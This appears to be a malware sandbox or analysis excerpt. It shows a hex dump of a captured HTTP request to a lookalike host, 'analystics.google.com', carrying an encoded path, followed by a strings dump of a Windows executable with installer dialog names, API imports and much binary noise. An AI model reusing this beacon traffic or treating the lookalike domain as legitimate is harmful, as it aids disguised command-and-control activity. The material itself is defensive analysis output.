0x000000b0 (00176)   47324676 42636449 57516e2f 53733733   G2FvBcdIWQn/Ss73
0x000000c0 (00192)   4e736569 76424153 5849502b 346d2048   NseivBASXIP+4m H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....


Strings
.z9H]
T>
>.>.
.
 
.
.
>
.>>
>....
.>
.K.
.
.
>..
..
.
9>
...
.>
.>1d..E..Y.
.
.
.
h
.
.
.
6Z>..w

1000
70ofdr+ws52oetf0
&Cancel
cnahxfgc-_8i7
Dialog
DVCLAL
ery0+9ma_c-ud#f
Generic1
gi5letqh0_4#wbpwq
hf _9rkg n+d3l
IDC_CONTINUE
IDC_EULACHECK
IDC_EULAMESSAGE
jsti-bp#2ebyb-dl
kxelies+#cx 
LDAP
lh6s0m3vb2
msctls_progress32
MS Sans Serif
NT AUTHORITY
oiak7luo
Operation
PACKAGEINFO
pi8l#76jy+p7y
Progress
scva32fm
TEXTFILEDLG
xze-aof 
0"0*000I0O0V0_0g0m0~0
0&0,080>0D0J0W0_0d0k0{0
0 0>0D0\0b0h0q0w0}0
0#03090?0N0X0`0h0p0x0
%0/070?0E0L0Y0a0h0r0x0~0
?"?*?0?A?W?]?c?i?u?}?
0E0K0Q0[0a0
<$<*<0<:<W<a<r<x<
1#1)121E1J1S1Y1c1h1
1$1.181C1I1S1Y1d1l1r1
1%1-1E1M1k1u1{1
1$1;1E1M1U1c1
1m_c5D
2"2(222B2K2W2a2g2r2z2
222;2E2O2Z2b2h2n2t2|2
2(2\2b2h2n2u2{2
2#2-2B2H2T2Z2`2f2q2
2"2'2D2J2P2h2p2
2!3-3<3_3e3l3v3
; ;2;A;U;[;a;f;z;
<2<:<B<J<R<Z<b<j<r<z<
?%?2?<?D?J?P?i?s?{?
>">*>2>:>X>f>l>r>x>~>
3"3(3.343Z3`3h3n3t3z3
3#3.3;3P3V3\3h3n3
3$3=4C4O4U4[4a4
; ;&;,;3;9;?;J;];d;j;p;v;|;
43494M4W4b4v4|4
4 4(464@4G4Z4b4
4'4-474>4F4L4S4r4x4~4
4"5A5g5
4?8?<?@?D?H?L?P?T?X?\?`?d?h?l?x?|?
;#;.;4;:;@;F;U;^;j;t;z;
?.?4?:?I?S?[?c?n?t?~?
5%555;5A5G5Q5~5
5"5(5.5P5V5\5|5
5/5*)5/9=/@,3,,>(+3<'88+89)A1'0.*)$.@-?$<:(=7+84
5(5I5Q5W5g5n5v5~5
= =5=;=D=Q=W=^=h=w=
>#>->5>=>L>V>^>f>s>y>
6%6.646:6?6E6V6_6k6u6{6
6$6(6.646:6@6D6V6h6n6t6z6
6!6'6-646:6C6I6N6Y6b6n6x6~6
)$@*6@j|
7(727=7C7Q7q7
7$7*707:7\7e7o7u7{7
7#7*707:7@7H7N7U7^7e7l7t7{7
7"7(7.747:7@7
7 7(7.757=7I7T7Z7`7f7l7|7
7A8T8]8i8s8y8
%?/,,.*+7>:B
{7%cz-3
8(8.848:8@8Q8
8"8(8.858;8A8G8Q8~8
8>%96(:A/$9&380$B'$,4;?1B&,)=&>0@@0.&(32
?"?(?.?8?=?C?N?T?a?f?r?z?
8lEWvXD B
9"9(9/959;9Z9`9f9l9r9
9(9U9f9n9|9
9,9x9~9
?}9B}-Ub
9dA/RY3q
9EOOU{
:):9:I:Y:i:y:
9lC>H[6
,[9=vnz7
A_A^A]A\_^]
='=[=a=h=
a]r>Hx
BDAuLT
BeginPaint
BuildCommDCBAndTimeoutsW
Bzl~	T
CallNamedPipeW
CloseProfileUserMapping
CompareFileTime
ConvertDefaultLocale
CopyFileExA
:!:':=:C:O:U:[:a:p:z:
=!=,=C=w=
DeleteTimerQueueEx
>D>J>T>Z>e>k>r>x>~>
DrawEdge
dTLAeB
e0Dc80w
="=*=>=E=O=W=_=k=q=w=
*Fh1J8
FindWindowExW
FreeConsole
GetCommandLineA
GetDesktopWindow
GetFileAttributesW
GetListBoxInfo
GetOEMCP
GetProcessShutdownParameters
GetStringTypeExW
GetUserDefaultLCID
GetVolumePathNameW
@GnEL@M
I@2C0Y
+i8ObE
.idata
"=IlD>k
InflateRect
:@:I:O:m:w:
>?>I>O>U>_>g>n>x>
IsDBCSLeadByte
IsWindowVisible
IsZoomed
<|?ixf
<_JIYT
JlQ'fo!
K6L!J_iRv*[*iuDu
;	<><K<e<m<s<}<
kernel32.dll
~)lMK3A
LoadLibraryA
LocalCompact
>Mb/|;
(m%dY)
MP3I'&#
+@naStk
NjO0S>
NO;@Fi
N-upfd
>+`O&9
Oa=M+d
oleaut32.dll
OpenDesktopW
OpenWaitableTimerA
*$osYy
oU(yWx
pI!-5E
P.rsrc
;&;,;P;V;\;b;
p{,XN.
q2R+se=eD
qG A%C
QnKOnA
.reloc
SafeArrayLock
SendMessageW
SendNotifyMessageA
SetTimeZoneInformation
TabbedTextOutA
tBf9t$(}
<'<T<e<s<y<
This program must be run under Win32
TransmitCommChar
:+U|!j
UnregisterWait
user32.dll
VarI1FromUI2
VerLanguageNameA
VirtualUnlock
]v@mQR
vm|`rd;
vpAX#"
VUg,pt
WaitMessage
WritePrivateProfileStructA
y6cmm{	
Z\'}].\
Z<Km0 B
$&)Zuy